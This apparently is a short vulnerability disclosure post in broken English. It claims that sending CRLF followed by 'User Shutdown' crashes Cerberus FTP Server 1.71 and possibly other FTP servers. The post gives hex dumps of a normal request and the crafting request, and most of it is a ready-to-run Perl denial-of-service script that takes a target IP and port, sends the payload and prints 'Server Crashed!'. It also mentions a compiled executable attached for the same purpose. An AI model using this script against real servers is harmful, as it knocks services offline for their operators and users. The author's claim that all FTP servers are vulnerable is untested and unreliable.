I have found
a very serious hole in FTPServer
The Exploit is tested on Cerberus FTP
Server 1.71 and a own coded, but I think all FTPServer are
Vulnerable
Sorry but i have to less ftpserver to
test
And so it Works
Typical
request:
00000000 55 73 65 72 20 53 68 75 74 64 6f 77 6e 0d
0a User Shutdown..
Exploit request:
00000000 0d 0a 55 73 65
72 20 53 68 75 74 64 6f 77 6e ..User
Shutdown
I've coded an exploit:
See attached file:
ftpcrash.exe (ziped) for people how have no perl
My exploit (in
perl):
[code]
-ftpcrash.pl-
print "Exploit for
FTP-Server\n";
print " by The real Remoter\n";
my $usage =
"\nftpcrash <IP> <Port>\n";
die "$usage" unless $ARGV[0]
&& $ARGV[1];
use Socket;
my $remote = $ARGV[0];
my $port =
$ARGV[1];
my $iaddr = inet_aton($remote);
my $proto =
getprotobyname("tcp");
my $paddr = sockaddr_in($port,
$iaddr);
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK,
$paddr) or die "Can't connect to " . $remote;
print "Sending
exploit\n";
$msg = "\x0d\x0a";
$msg = $msg . "User
Shutdown";
send(SOCK,$msg, 0) or die "Can't send
Exploit";
sleep(1);
print "Server
Crashed!";
sleep(1);
exit;
[/code]
Sorry for my bad english (I'm german)
smime.p7s